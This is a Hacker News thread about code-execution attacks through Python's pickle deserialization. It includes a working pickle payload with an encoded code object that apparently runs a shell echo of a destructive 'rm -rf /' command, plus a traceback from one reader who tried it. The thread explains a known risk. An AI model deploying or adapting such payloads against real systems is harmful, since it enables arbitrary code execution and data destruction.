Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

Shell-code attacks using pickled objects have been around for some time.

A pickle bytestring can execute completely arbitrary code. I have used them in my work.

An easy introduction: https://www2.cs.uic.edu/~s/musings/pickle/

An example:

  payload = b"ctypes\nFunctionType\n(cmarshal\nloads\n(cbase64\nb64decode\n(S'4wAAAAAAAAAAAQAAAAIAAABDAAAAcxYAAABkAWQAbAB9AHwAagFkAoMBAQBkAFMAKQNO6QAAAAD6EGVjaG8gXCMgcm0gLXJmIC8pAtoCb3PaBnN5c3RlbSkBcgMAAACpAHIFAAAA+gc8c3RkaW4+2gdwYXlsb2FkBAAAAHMEAAAAAAEIAQ=='\ntRtRc__builtin__\nglobals\n(tRS''\ntR(tR."
  from pickle import loads; loads(payload) # don't do it...!
(p.s., a matplotlib core dev told me they may move away from their use of pickle for this very reason.)


Python 2.7 didn't have much love to give :-)

  Traceback (most recent call last):
    File "<pyshell#1>", line 1, in <module>
      from pickle import loads; loads(payload) # don't do it...!
    File "...\lib\pickle.py", line 1388, in loads
      return Unpickler(file).load()
    File "...\lib\pickle.py", line 864, in load
      dispatch[key](self)
    File "...\lib\pickle.py", line 1139, in load_reduce
      value = func(*args)
  ValueError: bad marshal data (unknown type code)


Python 3 uses a new pickling format (protocol) by default. That doesn't mean Python 2 isn't vulnerable.


I just left a tongue in cheek comment and you just killed it with a dry reply :( yes, I'm well aware...


Sorry! :)




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: